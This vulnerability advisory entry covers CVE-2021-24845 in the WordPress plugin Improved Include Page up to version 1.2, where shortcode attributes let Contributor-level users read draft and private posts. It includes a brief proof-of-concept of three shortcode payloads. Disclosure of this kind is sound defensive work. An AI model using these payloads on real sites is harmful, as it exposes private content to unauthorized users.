Lucene search
Francesco CarlucciWPVDB-ID:AB857454-7C7C-454D-9C7F-1DB767961E5FHistoryNov 15, 2021 - 12:00 a.m.
Improved Include Page <= 1.2 - Contributor+ Arbitrary Posts/Pages Access
2021-11-1500:00:00
Francesco Carlucci
wpscan.com
8
improved include page
contributor access
arbitrary content access
shortcode attributes
post type
post status
EPSS
0.001
Percentile
32.8%
The plugin allows passing shortcode attributes with post_type & post_status which can be used to retrieve arbitrary content. This way, users with a role as low as Contributor can gain access to content they are not supposed to.
PoC
[include-page allowtype=“post” allowstatus=“draft” id=“131”] [include-page allowtype=“post” allowstatus=“private” id=“132”] [include-page allowtype=“custon-post-type” allowstatus=“any” id=“{ID}”]
Related
patchstack
patchstack
cvelist
cvelist
wpexploit
wpexploit
Improved Include Page <= 1.2 - Contributor+ Arbitrary Posts/Pages Access
2021-11-15 00:00:00
prion
prion
Design/Logic Flaw
2021-12-13 11:15:00
nvd
nvd
CVE-2021-24845
2021-12-13 11:15:08
cve
cve
CVE-2021-24845
2021-12-13 11:15:08